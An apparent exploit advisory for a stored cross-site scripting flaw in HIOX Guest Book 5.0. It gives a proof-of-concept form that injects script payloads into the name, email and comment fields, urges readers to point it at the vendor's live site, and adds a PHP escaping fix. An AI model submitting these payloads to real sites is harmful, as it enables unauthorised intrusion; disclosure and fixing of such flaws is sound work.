
HIOX GUEST BOOK 5.0 (HGB-5.0) Cross Site Scripting

Author: JoKeR_StEx , Published: 03-01-2014
#############################################################################

# Exploit Title : HIOX GUEST BOOK 5.0 (HGB-5.0) Cross Site Scripting

# Author : JoKeR_StEx

# Tested On : Windows

# Download Software Link : www.hscripts.com/scripts/php/downloads/HGB.zip

# Date : 03/01/2014

#############################################################################
[+] P.O.C

<form action="http://127.0.0.1/HGB/add.php" method="POST">
<!--In Name -->
<input type="hidden" name="name1" value=""><script>prompt('JoKeR_StEx')</script>">
<!-- In Email -->
<input type="hidden" name="email" value=""><script>prompt('xss (email)')</script>">
<!-- in comment -->
<input type="hidden" name="cmt" value=""><script>prompt('xss (comment)')</script>">
</form>

[+] To test the exploit (example)

ex:http://www.hscripts.com/scripts/php/HGB/add.php

Just replace http://127.0.0.1/HGB/add.php with http://www.hscripts.com/scripts/php/HGB/add.php ^___^
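
[+] Fix sketch (added example, not HGB's own code): the three POST fields the P.O.C form targets (name1, email, cmt) are validated on input and HTML-escaped at output time. Function names, length limits and markup are assumptions; only the field names come from the P.O.C.

```php
<?php
// Added example, not HGB's code. Field names name1, email, cmt are taken
// from the PoC form; function names, limits and markup are assumed.

/** Escape a value for an HTML text or quoted-attribute context. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Validate one guestbook submission; returns [entry, errors]. */
function validate_entry(array $post): array
{
    $errors = [];
    $entry  = [];
    foreach (['name1' => 60, 'email' => 254, 'cmt' => 2000] as $field => $max) {
        $v = $post[$field] ?? '';
        if (!is_string($v)) {            // reject array input such as name1[]=x
            $errors[] = "$field: wrong type";
            continue;
        }
        $v = trim($v);
        if ($v === '' || strlen($v) > $max) {
            $errors[] = "$field: empty or too long";
        }
        $entry[$field] = $v;
    }
    if (isset($entry['email'])
        && filter_var($entry['email'], FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'email: not a valid address';
    }
    return [$entry, $errors];
}

/** Render a stored entry; raw values are escaped here, at output time. */
function render_entry(array $e): string
{
    return '<div class="entry"><b>' . h($e['name1']) . '</b> &lt;'
         . h($e['email']) . '&gt;<p>' . nl2br(h($e['cmt'])) . '</p></div>';
}

// Constructed sample: markup in name1/cmt passes validation, so the
// escaping in render_entry() is what keeps it inert in the page.
$sample = ['name1' => '"><script>prompt(1)</script>',
           'email' => 'visitor@example.com',
           'cmt'   => "hello\n\"><script>prompt('xss (comment)')</script>"];
[$entry, $errors] = validate_entry($sample);
echo ($errors ? implode("\n", $errors) : render_entry($entry)) . "\n";
```

Validation only narrows what is accepted; the name and comment fields are free text, so the escaping in `render_entry()` must be applied everywhere stored entries are printed.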

################################################################################
# Gr33t'z To : Asesino04 , Shield Dz , & All My Friends & All Algerians
################################################################################
email : jokerdz44@yahoo.fr
Facebook : fb.me/imadlilong.lasvegas
twitter : @JoKeR_StEx
